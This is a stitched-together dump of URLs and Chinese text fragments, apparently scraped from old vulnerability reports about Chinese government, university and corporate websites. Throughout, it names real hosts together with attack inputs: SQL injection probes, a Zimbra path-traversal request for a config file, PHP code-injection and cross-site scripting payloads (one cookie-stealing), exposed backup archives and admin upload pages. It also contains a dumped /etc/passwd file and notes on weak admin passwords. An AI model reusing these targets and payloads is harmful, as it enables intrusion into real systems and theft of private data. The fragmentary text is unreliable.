http://zhaopin.hi.chinamobile.com/hr/recruit/candidate_portal_info.ac http://mdsn9.hangzhou.com.cn/usershow.php?uid=1870 http://mdsn9.hangzhou.com.cn/admin http://www.baidu.com/p/sys/data/time/timeline?category=年月1|年月2|年月n&offset=事件偏移量&portrait=一个ID,可以在个人主页网页源码中看到 
http://www.baidu.com/p/sys/data/time/timeline?category=201403&offset=0&portrait=我的ID http://www.9h.com.cn/defray/defrayIndex.action http://appadmin.jiumei.com/ http://wapqh.189.cn,一路畅通无阻…… http://sms.xz.vnet.cn:7002/User/upgroupfile.asp http://sms.xz.vnet.cn:8044 http://sms.xz.vnet.cn https://passport.suning.com/ids/login?service=https%253A%252F%252Fmember.suning.com%252Fwebapp%252Fwcs%252Fstores%252Fauth%253FtargetUrl%253Dhttps%25253A%25252F%25252Fwww.suning.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSNTrustLogonInterceptorCmd%25253FstoreId%25253D10052%252526catalogId%25253D10051%252526app_id%25253D1007%252526target_url%25253Dhttps%25253A%25252F%25252Fpay.suning.com%25252Fepp-portal%25252Fuseraccount%25252Fuser-account%252521initUserAccount.action%252526trust_sn%25253D4a41a43b5d79408ea974a80b25f966fb&method=GET&loginTheme=b2c https://passport.suning.com/ids/login?service=https%253A%252F%252Fmember.suning.com%252Fwebapp%252Fwcs%252Fstores%252Fauth%253FtargetUrl%253Dhttps%25253A%25252F%25252Fwww.suning.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSNTrustLogonInterceptorCmd%25253FstoreId%25253D10052%252526catalogId%25253D10051%252526app_id%25253D1007%252526target_url%25253Dhttps%25253A%25252F%25252Fpay.suning.com%25252Fepp-portal%25252Fuseraccount%25252Fuser-account%252521initUserAccount.action%252526trust_sn%25253D4a41a43b5d79408ea974a80b25f966fb&method=GET&loginTheme=b2c%22%3E%3Cimg%20src=%22test http://rw.baidu.com/forum.php?mod=viewthread&tid=1082&extra=page%3D1 http://movie.damai.cn/ http://mail.eco.gov.cn/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 www.china-cba.net http://106.37.172.4/WebUI/Login.aspx http://www.tanbu.gov.cn/travelsDetails.php?newsid=332 http://bbs.160.com/ http://eng.impulsefitness.com/product-list2.aspx?SID=21 http://211.144.152.51/ http://jbq.tourzj.gov.cn/jbgk_1.aspx?id=1 http://xyzs.com/ 
http://admin.xyzs.com/ http://bbs.share.youku.com/forum.php?mod=viewthread&tid=2114 http://nyj.jl.gov.cn/AgencyView.php?Id=1存在多种注入漏洞。可通过注入获得数据库,列表,管理员,密码等重要数据库信息。 http://usercms.hxsd.com/admincp/archive.php?do=add&channelid=47 http://www.edong.com/host/exclusive_host_detail.aspx?line_Id=-1&Product_Class_Id=1&SystemId=3 http://edong.com/host/exclusive_host_detail.aspx?line_Id=-1&Product_Class_Id=1&SystemId=3 http://www.xjhj.gov.cn/xjhj.gov.cn.rar http://www.sqxzfw.cn/sqxzfw.cn.rar http://www.gdgxs.gov.cn/gdgxs.gov.cn.rar http://www.xjtl.gov.cn/xjtl.rar http://www.xingtang.gov.cn/web.rar http://segmentfault.com/u/shamiao http://bbs.letv.com/forum.php?mod=viewthread&tid=312647&page=1&extra=#pid11815243 http://hr.sf-express.com/jobs/3838/index.php http://go.sohu.com/2013/innovator/showwork.php?work_id=90946 http://,而且还漏了个/ http://photos.indaa.com.cn/index/wsortshow?&offset=20&id=69 http://xxx.xxx.32.151:8080/zabbix/ http://www.ceppbooks.sgcc.com.cn/ http://wubi.sogou.com/bbs/home.php?mod=space&uid=1030345&do=profile&mobile=yes site:zdnet.com.cn inurl:page http://wo.zdnet.com.cn/page/zhuantifayan.php?id=2037347[注入点]对注入点手工测试如图: http://wo.zdnet.com.cn/page/zhuantifayan.php?id=2037347 http://wo.zdnet.com.cn/page/zhuantifayan.php?id=2037347 http://www.oir.pku.edu.cn/ http://bbs.tl.changyou.com/forum.php?mod=viewthread&tid=31298789&extra=page%3D1&page=4 http://www.renren.com/288518215#!/256405***其中足迹可以点击 http://www.renren.com/288518215#//status/status?id=539648288,感谢人人网小伙伴Q的号提供测试。288518215为我的测试号,539648288为小伙伴Q的测试号。两个号为陌生人。 http://sv7.wljy.sdu.edu.cn:8088/jsj/kcxx/knowledge.jsp?id=15 http://221.7.197.12/gxfgw/,出现登录界面,界面右下角有操作手册下载,文档中包含登录系统所使用的用户名和密码。 http://fyyhbank.com/display.php?id=282 http://fyyhbank.com/admin/kindeditor/php/file_manager_json.php?path=/ http://fyyhbank.com/admin/ http://www.pusa123.com/Get_HsfSecnew.php http://data.trust.hexun.com/list.aspx?fundsinvest=2 http://zt.zjmb.gov.cn/forum/qtforumlist.jsp?search_kwd=&begin=2013-03-12&end=2014-03-12 
http://zt.zjmb.gov.cn/forum/qtforumlist.jsp?search_kwd=&begin=2013-03-12&end=2014-03-12 http://www.pp.cc/manage/home http://www.594sgk.com/s/ http://shegongku.org/passwd/ http://www.sojb.pw/ http://talk.zj.com/detail.cgi?id=175276 http://www.meilishuo.com/biz/reg_feedback/newyear/?cid=457 http://www.sc-mg.com.cn/news.php?module=news&act=show&classid=12&id=434 http://fanyi.youdao.com/WebpageTranslate?keyfrom=fanyi.web.index&url=http%3A%2F%2Fsuzuki.at.vc%2Ftest%2F2.txt&type=AUTO http://status.renren.com/GetSomeomeDoingList.do?userId=123456&curpage=0 http://bbs.browser.qq.com/uc_server http://jjw.huzhou.gov.cn/vote/login.asp http://game.kingsunsoft.com/UserCenterAjax.aspx?UserID= http://202.98.157.99/ http://outdoor.qq.com/ http://px.admin5.com/ http://jpkc.njau.edu.cn/zyyhjjjx/jxdg/index.asp?id=1 http://jpkc.njau.edu.cn/zyyhjjjx/admin/eWebEditor/admin_login.asp http://www.souvi.com/shownews.asp?sclass=692&bclass=90&id=1064 http://www.souvi.com/about.asp?id=631 http://www.souvi.com/download.asp?id=674 http://www.souvi.com/internet.asp?id=973 http://www.souvi.com/mobile.asp?id=969 http://www.souvi.com/products.asp?id=1056 http://www.souvi.com/project.asp?id=959 http://www.souvi.com/serve.asp?id=955 http://www.souvi.com/showcontent.asp?id=742 http://www.souvi.com/VR.asp?id=964 http://www.hbnky.com/ http://corp.topay.com.cn/b2b/jsp/common/loginAction.action http://corp.topay.com.cn/xyhd/jsp/common/newLogin.do http://eshop.qdaeon.com/index.php?shop_id=7010 http://web.7k7k.com/code/ajax.php http://web.7k7k.com http://220.196.57.147:8080/GetUnit.aspx?RmtpId=0002&service=api_getUnitRmtp&UnitId=0705 http://fs.elong.com/swfupload/swfupload.swf http://lvyou.elong.com/static/swfupload/js/lib/swfupload.swf http://jwgl.hnuc.edu.cn/Public/ShowGGTZ.asp?GGTZID=317【这里】 http://114.255.66.248/jiaowu/Public/ShowGGTZ.asp?GGTZID=218【这里】 http://jw.jzu.cn/jiaowu/Public/ShowGGTZ.asp?GGTZID=1155【这里】 http://219.148.49.53/jiaowu/Public/ShowGGTZ.asp?GGTZID=223【这里】 
http://218.197.80.9/jiaowu_fsxy/Public/ShowGGTZ.asp?GGTZID=105【这里】 http://220.196.57.147:8080/ http://www.sctl.com.cn:9080/portal/c http://www.sctl.com.cn:8080/yyoa/ http://web.7k7k.com/source/cms/newServer.php http://web.7k7k.com:80/ http://www.jinjianginns.com/cityattractions/AttractionsSingle2.aspx?sceneryId=160&cityId=3100 http://www.jinjianginns.com/hotel/jChainHotelComment.aspx?unitId=9013&cityId=4101&from=2 http://ticket.cib.com.cn/web.rar http://bbs.160.com/1.tar.gz http://xxxx.xx:8080/global.php,所有均存在路径泄露 http://iread.wo.com.cn/ http://dms.jnc.cn:5881/FYSYS/login.action http://gzgl.etec.edu.cn/ Url:http://www.sxswst.gov.cn/bureau/xxgkContent.asp?fid=732 www.sxswst.gov.cn/bureau/xxgkContent.asp?fid=732 http://xj.vae.ha.cn/1/bl/login.jsp http://xj.vae.ha.cn/1/x/stumain_detail.jsp?editcode=0741000940564 http://xj.vae.ha.cn/1/tj/stuxj_detail.jsp?editcode=09410105400307 http://xj.vae.ha.cn/1/tj/stuxj_detail.jsp?editcode=09410105400305 http://www.letushuo.com http://sipo-hb.com/Detail.aspx?ContentId=459 http://oa.wxmetro.net/login/Login.jsp http://bbs.xingcloud.com/uc_server/admin.php http://jlsccx.zjt.gov.cn/Law/Search/lawDetailInfo.aspx?Id=35 http://i.koolearn.com/snscustomer/basicinfo site:17wo.cn”一下,得到可能的注入点:http://card.17wo.cn/wap/wap_card.php?id=2548 card.17wo.cn/wap/wap_card.php?id=2548 http://sqlmap.org http://tuya.app.7k7k.com/user/uid/xxxxxxxx http://tuya.app.7k7k.com/user/uid/483959732 http://gzw.zj.gov.cn/module/rss/rssfeed.jsp?colid=18 http://audit.dajie.com/club/YJSProject/editDetail?id=12222&status=2&refer=audit http://k.yiban.cn http://k.yiban.cn/index.php?c=useredit&a=studentdatashow,下图中的所有项目均可更改。 http://iknowyourip.com/getip.php http://k.yiban.cn/index.php?c=useredit&a=userEdit http://www.shenzhenair.com/userManager/regist.jsp http://61.141.235.247:8083/login.action root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin 
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin asoon:x:500:500::/home/asoon:/bin/bash benny:x:501:501::/home/benny:/bin/bash resin:x:503:503::/home/resin:/bin/bash cc:x:504:504::/home/cc:/bin/bash hadoop:x:505:505::/home/hadoop:/bin/bash http://p2.easou.com/bra.e?flag=0&brandname=%E4%B8%89%E6%98%9F&esid=MujDHuWgZ9Y http://els.abchina.com/student/examinationCenter/studentLookExam.action http://www.tjbhb.com/ http://www.ubao.com/ubao/toLogin.action http://www.k-touch.cn/product/condetail/prod_id/123.html http://sms.tom.com/pk12530/ub/news_admin/engine/index.php http://sms.tom.com/sms_admin/index.html www.doctorcom.com http://mail.cib.com.cn/ http://baozoumanhua.com/ http://jcxt.htinns.com/mail.txt 
http://hi.haidilao.com/pages/haidl/alter_password_phone.jsp,如下图所示,在找回密码的第一步填写帐号A的手机号和手机收到的验证码: http://www.ztyz.cn:8890/web/webIndex_index.action http://my.mbaobao.com/member/profile/info http://vip.club.sohu.com/szzmjc/public/upload_img/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{window.x=1;confirm%28document.cookie%29}// http://42.120.40.73:8082/ http://42.120.40.73:8081/ www.letushuo.com http://www.letushuo.com/data/baksql/ http://mv.wo.com.cn/ http://graduate.buaa.edu.cn/TutorInfo.jsp?id=14754 zyjd.spb.gov.cn/downloadaction.action http://bbs.xiaomi.cn/thread-8102239-1-1.html http://www.xiaomi.com/会出现需要安全令牌方可登陆 https://i.xiaomi.com/直接登陆,无任何阻拦和提示就登陆成功了,成功登陆到这个网站就不用说了,在转到小米的其他网站都是可以的(通吃大部分小米的网站),https://i.xiaomi.com/是小米个人数据中心,客户的各种隐私都在里面,看截图 http://www.redcross.ecnu.edu.cn/houtai/login.asp http://www.hozoo.com.cn/Uploadpic/200962173257604.xls http://www.hozoo.com.cn/Uploadpic/2009521131459878.xls http://www.hozoo.com.cn/Uploadpic/2009615135449845.xls http://www.hozoo.com.cn/Uploadpic/2009615132934817.xls http://www.hozoo.com.cn/Uploadpic/20098315156729.xls http://www.hozoo.com.cn/Uploadpic/200987153133341.xls http://www.hozoo.com.cn/UploadPic/201003/20100317105435835.doc http://www.lsbchina.com/index.html http://jlzx.bgu.edu.cn:8081/zcxx.zcxxb.do http://www.cugb.edu.cn/gmoreInfo.action?bigClassID=15 http://labs.chinamobile.com/ http://legal.people.com.cn/n/2014/0303/c203936-24509144.html http://123.15.49.75:1000/login.wdm http://www.xdja.com/web/.svn/entries http://tuya.app.7k7k.com/detail/id/2245684 http://job.bjut.edu.cn/bjutCms/course/queryAllCourseInfo.action http://www.shdc.org.cn/yl_forum/forums/list.page)管理员弱口令:admin/admin http://innofair.cofco.com/?a=newsdetails&news_id=114&m=News http://www.busap.com/test.php http://www.busap.com/mybusmylife/comment.php http://dag.chd.edu.cn/news/index.asp?show=242 http://www.hbitsx.com.cn http://www.ks.js.cn http://yz3g.mobi http://www.hbitsx.com.cn/ImageContent.aspx?BlockTypeID=1&IsFirstPage=1 
http://www.hbitsx.com.cn/MoreContentList.aspx?QNum=20140125 http://www.hbitsx.com.cn/forum.aspx?QNum=20140125&BlockTypeID=1&IsFirstPage=1 http://food.ks.js.cn/sj_show.aspx?id=1041 http://food.ks.js.cn/web_1/default.aspx?id=1041 http://food.ks.js.cn/ztshow.aspx?id=61 http://food.ks.js.cn/wbshow.aspx?id=1427&keepThis=true&TB_iframe=true&height=350&width=400 http://yz3g.mobi/flow/ http://www.imac.edu.cn/xygk.asp?id=2 http://xj.bnet.cn/si/session/logout.do http://www.masrfb.gov.cn/ http://sz120.ahsz.gov.cn/ http://www.wdqgtzy.gov.cn/ http://www.bbjj.gov.cn/ http://www.wjfy.gov.cn/ http://www.fygh.gov.cn/ http://www.cnjt.gov.cn/ http://www.nmhnhbj.gov.cn http://www.bjgy.gov.cn/ http://lib.zzti.edu.cn/ http://www.nanzhang.jcy.gov.cn/ http://jsj.beichuan.gov.cn/ http://wwkjj.ww.gov.cn/ http://www.qznyw.gov.cn/ http://txx.gov.cn/ http://labs.chinamobile.com/events/forum/forum_comment.php http://www.puyang.gov.cn/hdq/xntsa_send.asp?action=add http://www.***.gov.cn/wsjb/visitshow.asp?id=49 http://www.***u.gov.cn/xinfang/visitshow.asp?id=13 http://www.jyj.***.gov.cn/jzxx/visitshow.asp?id=17 http://www.y***.gov.cn/xf/visitshow.asp?id=2 http://www.***l.gov.cn/xzxx/visitshow.asp?id=25 http://www.***.gov.cn/wsxinfang/visitshow.asp?id=130 http://www.q***c.gov.cn/sfwt/visitshow.asp?id=12 http://www.c***du.com/xzxx/visitshow.asp?id=67 http://210.30.***.***9/sos/visitshow.asp?id=14 http://222.90.***.***/jjsh/ts/ruleshow.asp?id=4 http://www.z***.cc/xzmail/visitshow.asp?id=26 http://www.m***.net/zf/visitshow.asp?id=14 http://www.***1.com/mail/visitshow.asp?id=31 http://syesx.***.net/email/visitshow.asp?id=13 http://www.w***zx.com/xzxx/visitshow.asp?id=12 http://w***.***e.com/visitshow.asp?id=23 http://www.cqjjxzfw.gov.cn/application/bszhinan/bszn_sm.jsp?id=27 http://www.cqjjxzfw.gov.cn/application/bszhinan/bszn_sm.jsp?id=27 http://www.iptv-soft.com:8080/cms/web/bbs_news/uploadswf.jsp http://www.zzbtv.com:8080/cms/web/bbs_news/ http://www.xxx.com:8080/cms/conf/system.xml 
http://www.xxx.com:8080/cms/conf/relatesystem.xml http://www.iptv-soft.com:8080/cms/conf/system.xml http://www.iptv-soft.com:8080/cms/web/jwzt/searcher/config.ini http://www.zzbtv.com:8080/cms/web/jwzt/searcher/config.ini http://www.hxvos.com:8080/cms/web/jwzt/searcherWJkk/config.ini http://www.xygbdst.com:8899/caiji/article.jsp?ac=articleNoticeView&id=70 http://www.hnca.gov.cn/txglj.tar.gz http://smsemp.staff.xdf.cn/xdf/getphoneword http://login.mbaobao.com/user/resetpwd?type=email&__t__=System.mbaobao.getPassword&__e__=9******1%40qq.com&__c__=231135ca-e7f0-418e-9b59-7779ff744acb&__x__=635305213890183927&__ss__=5A69BB723927A5E9E0E1D6BA7A63CCC2 http://gys.hi.chinamobile.com/supplier/viewLogin.action http://www.bjrct.haoyisheng.com/rct/indexgo http://www.shrct.haoyisheng.com/rct/indexgo http://www.xjrct.haoyisheng.com/rct/indexgo http://www.hnrct.haoyisheng.com/rct/indexgo http://www.jsrct.haoyisheng.com/rct/indexgo http://www.bjrct.haoyisheng.com/rct/indexgo为例, http://www.bjrct.haoyisheng.com/rct/pages/regNews.jsp注册帐户 http://ldj.jiangmen.gov.cn/outside/shebk/index.php?controller=Default&action=read&type=22 http://ldj.jiangmen.gov.cn/phpinfo.php http://www.julaa.com/lesson.aspx?keys=% http://forum.h3c.com/forum.php?mod=viewthread&tid=142703&extra= http://www.jzcbank.com/admin/Databackup/3.asp http://127.0.0.1 http://m.bjdxkf10000.com/ http://m.bjdxkf10000.com/info.asp?id=3&info=ji_price http://bbs.lenovomobile.com/LeServiceWebService/Service2.asmx/GetApkVersionJSONByModel http://ns3.tom.com/ http://开头的完整路径,如:http://www.xxx.com/myorder.html ftp://bid2.ha.sgcc.com.cn/ http://dms.jnc.cn:5881/FYSYS/login.action http://ea.bgu.edu.cn/shownews.asp?newsid=1128 http://jxgl.csiic.com/ http://www.yzxz.safea.gov.cn//2011_yzjdmd_detail.php?d=1 http://www.yzxz.safea.gov.cn//2011_yzjdmd_detail.php?d=1 data:text/html;base64,PHNjcmlwdD5hbGVydCgid29veXVufnRlc3QiKTwvc2NyaXB0Pg== 
http://xzfw.wulian.gov.cn/portal/xzsp_wulianxian/wssb.aspx?orgid=1&org=%e7%bb%bf%e8%89%b2%e9%80%9a%e9%81%93%e5%8a%9e%20 http://xzfw.wulian.gov.cn/portal/xzsp_wulianxian/wssb.aspx?orgid=1&org=%e7%bb%bf%e8%89%b2%e9%80%9a%e9%81%93%e5%8a%9e%20orgid=1 http://xzfw.wulian.gov.cn/qyztc/upload/picnews/jc.asp http://221.179.180.157:8086/WX_MP/index.action?key=11273b38b353c9f011883ee33bd1db7d&key2=W7fbd7022b7c00ee5b69ff2c2e704b858 http://www.siteserver.cn/case/62.html http://www.cctvad.org http://***.gov.cn/admin/upload.jsp http://www.y***.gov.cn:9999/admin/upload.jsp http://www.h***x.gov.cn/admin/upload.jsp http://www.t***.net/admin/upload.jsp http://***w.t***ao.gov.cn/admin/upload.jsp http://www.***.gov.cn/admin/upload.jsp http://www.y***w.gov.cn/admin/upload.jsp http://www.x***x.gov.cn/admin/upload.jsp http://www.w***w.gov.cn/admin/upload.jsp http://www.***p.gov.cn/admin/upload.jsp http://***w.s***u.gov.cn/admin/upload.jsp http://***p.***k.gov.cn:8070/admin/upload.jsp http://218.***.***.19/admin/upload.jsp http://x***.***s.gov.cn/admin/upload.jsp http://www.t***x.com/admin/upload.jsp http://110.7.***.***:8081/admin/upload.jsp http://221.235.***.***/admin/upload.jsp http://www.***.gov.cn:82/web_xzfw/admin/upload.jsp http://www.b***.gov.cn:8092/admin/upload.jsp http://www.y***5.gov.cn:9999/admin/upload.jsp http://***p.***y.gov.cn/admin/upload.jsp http://221.229.***.***/admin/upload.jsp http://www.ciscn.cn/readTeamInfo.action?opt=index&teamid=10904 http://www.ciscn.cn/queryUserInfo.action?opt=selectguid&usertype=1&teamid=10904 http://opac.bgu.edu.cn/opac/item.php?marc_no=0000059842 http://zy.bgu.edu.cn//college/detail/%5c/1.html http://ea.bgu.edu.cn/showsearch.asp http://t.xcb.sdo.com/admincp/ServiceApp.aspx http://t.xcb.sdo.com/admincp/GroupPage.aspx http://opac.bgu.edu.cn/opac/item.php?marc_no=0000059842 http://lib.math.ac.cn:8080/opac/item.php?marc_no=0000018842 http://tsgl.nhic.edu.cn:8080/opac/item.php?marc_no=0000018842 
http://202.203.132.134:8080/opac/item.php?marc_no=0000018842 http://lib.math.ac.cn:8080/asord/asord_cls_browse.php?cls_no=A http://210.31.47.7:8080/asord/asorditem.php?asord_marc_no=0003039889 http://lib.math.ac.cn:8080/asord/asord_marc_record.php?cata_no=%E9%AB%98%E6%95%992011 http://mailsubs.zs.gov.cn:88/second/index.php http://duihua.zs.gov.cn:88/view/?ID=98 http://jwc.yangtzeu.edu.cn:8080/serverCFG.TXT http://www.189esy.cn http://www.piao123.com/wzgg.php?id=33 http://tools.xunzai.com/youbian/?q=%7B%24%7Bphpinfo%28%29%7D%7D http://tools.xunzai.com/zhongcaoyao/?q=%7B%24%7Bphpinfo%28%29%7D%7D http://tools.xunzai.com/jiufang/?q=%7B%24%7Bphpinfo%28%29%7D%7D http://tools.xunzai.com/yanfang/?q=%7B%24%7Bphpinfo%28%29%7D%7D http://tools.xunzai.com/pianfang/?q=%7B%24%7Bphpinfo%28%29%7D%7D http://tools.xunzai.com/mingfang/?q=%7B%24%7Bphpinfo%28%29%7D%7D http://tools.xunzai.com/xiehouyu/?q=%7B%24%7Bphpinfo%28%29%7D%7D http://tools.xunzai.com/meng/?q=%7B%24%7Bphpinfo%28%29%7D%7D http://tools.xunzai.com/miyu/?q=%7B%24%7Bphpinfo%28%29%7D%7D http://tools.xunzai.com/yanyu/?q=%7B%24%7Bphpinfo%28%29%7D%7D http://tools.xunzai.com/mingyan/?q=%7B%24%7Bphpinfo%28%29%7D%7D http://tools.xunzai.com/raokouling/?q=%7B%24%7Bphpinfo%28%29%7D%7D http://www.google.co.in/search?q=inurl:Course_Default.aspx%3Ftypeid%3D&newwindow=1&filter=0&biw=1366&bih=642 http://www.hbdrc.gov.cn/interaction/sewgh-list.jsp?module=Mailbox http://news.tv.china.com/special/newsinfo.php?id=18377274 http://www.m1905.com/special/showForDeveloper.php?specialid=873&tid=1043774 http://www.71school.edu.sh.cn/website/web/jxzy/web/page/index.asp?id=1 http://www.dcnglobal.com/ http://cyjj.bgu.edu.cn/Default.aspx http://125.32.42.242/ http://www.ctsfj.com/info/index.asp?id=1 http://esales.10010.com/就好奇,想弄个账号进去看看 http://esales.10010.com/ http://www.jl.jl.gov.cn/showgg.php?id=36227 http://www.118958.org/ http://61.191.25.187/ http://lolbox.duowan.com/reparieLostPlayer.php?playerName=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E 
http://lolbox.duowan.com/playerList.php http://edm.m1905.com/.svn/entries http://www.zjxnc.net/admins/ http://yiting.zjxnc.net/admins/ http://yiting.zjxnc.net/includes/cbrChangecun.jsp?dqbh=1 http://yiting.zjxnc.net/includes/rkfzChange.jsp?ssdq=1 http://yiting.zjxnc.net/includes/cbrChange.jsp?sszs=1 http://www.zjxnc.net/includes/uploadFJ.jsp?zd= http://www.o2network.com.cn/news2.php?id=339 http://www.56177.cn/member/login.do url:http://bbs.teamcen.com/thread-3-10.html data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4= data:text/html;base64,PHNjcmlwdC9zcmM9aHR0cDovL3QuY24velliWmROZD4= http://www.hot-spring.cn/zixun/show.asp?id=1362&classid=1 http://i.jd.com/trace/share.action?reu=http://www.jd.com/product/837076.html&u=!103!117!106!105!97!110!103!104!117!97!53!55!49!50&t=2&f=7 http://guang.jd.com/user/followUser.action?pinList=ID http://www.tecnova.cn/ http://218.57.137.135:8080/TravelSortInfoSystem/ http://60.216.117.229:8787/TravelSortInfoSystem/ http://www.google.de/#newwindow=1&q=inurl:m%2Fsearch%2Flist.php%3FsiteId%3D http://pop.hengan.com/mail5/jilinbsc.nsf/WebHelp/!OpenPage http://www.bnchina.com:8080/queryUser.do?hongru_username=宽带账号&hongru_accountId=宽带账号 http://wms.orion.com.cn/login.aspx http://wms.orion.com.cn/login.aspx cn:80/webmail/admin/index.php?action=login&module=user&return=/webmail/admin/ http://t9.go2oa.com:86/t9/login.jsp,登陆后,core/funcs/news/show/reNews.jsp页面存在mysql报错注入漏洞,可以获取系统数据信息。 http://school.hi165.com/ http://www.tax.sx.cn/nsfw/list_detail.asp?pid=292 http://m.jd.com/ware/orderCommentDetail/1016853983_1ddff44a-d34b-435c-8047-832de22bb1d8.html?sid=050b68e3ee5e46b1f73f733dac963468 http://bbs.wasu.cn/data/backup_157445/ http://www.sxforest.gov.cn//LeaderDetail.aspx?id=1&type=3 www.cctvad.org//siteserver/platform/background_dbSqlQuery.aspx http://app.migc.xiaomi.com/cms/interface/v5/featured1.php http://42.62.57.16/cms/interface/v5/featured1.php http://42.62.57.15/cms/interface/v5/featured1.php 
http://www.ziroom.com/?_p=sign&_a=weakpassowrd&step=1&type=forgetpassword http://www.ziroom.com/index.php?_p=api&_a=customer&type=search&login_name=158xxxxxxxx http://www.magtech.com.cn/CN/column/column33.shtml http://www.magtech.com.cn/CN/item/downloadFile.jsp?filedisplay=../../CN/item/downloadFile.jsp http://www.lezhixing.com.cn/cms/lzx/case/index.jhtml http://202.108.154.209/datacenter/# http://202.108.154.209/oa/calendar/exportExcel.do ServicesAudition.asmx/GetRingInfo http://60.13.124.118/OrderRing.aspx?ringNo=9000720120615178827&type=0&ProgCode=0001&Seed=652 http://183.129.160.94/minshen/minshen.rar http://www.sstf.org.cn:8080/kjjr/show/kjpt!list.action http://59.33.44.119:81/boai_booking/index.php?op=booking_step_4 http://www.ppsc.gov.cn/logon.aspx?ReturnUrl=%2fDefault.aspx bt:/pentest/database/sqlmap# http://lanxin.wqapp.cn/a/w/0217/index.html?0211 http://www.weiqunapp.com/pc/index.do http://bureau.cctv.com/register.php,发现是access http://xj.vae.ha.cn/1/tj/stuxj_detail.jsp?editcode=09410105400313 http://app.bgu.edu.cn/docman/login.aspx http://113.105.248.232/ http://www.sxmz.gov.cn/content/topicdeal.jspid=13535&action=read http://ht.52xinyou.cn/xykj/login.aspx http://www.doov.com.cn/)存在dedecms http://news.hitvs.cn/ http://xitong.mingjuan.net/e-learning/listkaoshi2.asp?jiluid=283 http://60.10.25.13/www/ http://60.10.25.13/www/item_seach.php?field=plan_money&keywords=&order=desc&style=&town=&unit_id=&village= http://www.leesuntech.com/ http://www.leesuntech.com/demo http://www.leesuntech.com/demo/admin/ http://www.9you.com/o2xiaoshou/o2xiaoshou.rar http://gg.9you.com/9you.tar.gz http://www.fjetc.gov.cn/cszy/cs/index.aspx?ID=143 http://218.107.217.40/系统 http://219.142.70.6/ http://219.142.70.7:8080/ http://219.142.70.7:8080/arsys/ http://wooyun.org/bugs/wooyun-2010-030714,为毛这个没弱口令T_T) http://chl.vastpay.cn/main.action http://www.cumtyc.com.cn/ http://hkfw.kknk.cn/xm.asp http://www.lezhixing.com.cn/cms/lzx/case/index.jhtml http://vip.cntv.cn/ 
http://www.gzyb.com.cn:8080/GZYBWeb/login.action http://www.chinamcom.com/ http://www.kuaipan.cn/account_mobileReset.htm www.kuaipan.cn http://www.kuaipan.cn User:Password http://115.236.16.24/phpmyadmin/ http://www.shanghaitech.edu.cn/ORA_NewsMore.asp?tid=7 http://www.shanghaitech.edu.cn/ORA_NewsMore.asp?tid=7%20and%201=1 http://www.shanghaitech.edu.cn/ORA_NewsMore.asp?tid=7%20and%201=2 http://www.jxys.gov.cn/sale.asp?TaskNo=001008 http://www.tgps.cn/logoff_submit.do http://60.195.250.101:89/pgps/system/loginAction_execute.action http://vip4.exlive.cn/synthReports/home/homeAction_mgrLogin.action http://www.fjaudit.gov.cn/zfgd.aspx?p=1&ctlgid=82583512 http://ht.51book.com/login.htm http://weibo.com/u/3022690473/# http://www.nari-relays.com/ru/nr_shownews.php?id=86 Url:http://www.90619.com/ com:8088 http://www.bpeg.nc.sgcc.com.cn http://www.bpeg.nc.sgcc.com.cn/ww/contenttest.asp?newsisold=0&newsid=&newsformid=XXFBDTP&newssheetno=1402270004 http://www.bpeg.nc.sgcc.com.cn/ww/searchupdate http://211.160.72.252/special/index.php?sid=1 Url:http://www.ceppbooks.sgcc.com.cn Url:http://sxk.ceppbooks.com/user/ http://www.mailer.com.cn/New%20Customers/index1.htm http://mail.njzj.gov.cn:8080 http://61.155.50.151 http://mail.lyx928.com:8080 http://mail.shszx.gov.cn:8600 http://mail.censoft.com.cn http://mail.ascentgolden.com:8080 http://61.155.50.151 http://mail.lyx928.com:8080 http://mail.censoft.com.cn为例,作全程解说。 http://mail.censoft.com.cn/tmw/211ede8H38f/mailmain?type=msaveuser http://www.4007123123.com/userhome/ajax/getaddressbase.aspx?cityid=1存在sql注入 http://www.hljsjjy.com/listzt.asp?id=520 http://tmoa.stdu.edu.cn/webpages/login.aspx http://www.36kr.com/p/210505.html),号称可以“可直接连接储蓄卡网银解析账单,突破以往只能解析信用卡账单的限制”,作为每看到新产品都想跃跃欲试的偶,觉得安全问题才是我考虑的重中之重! 
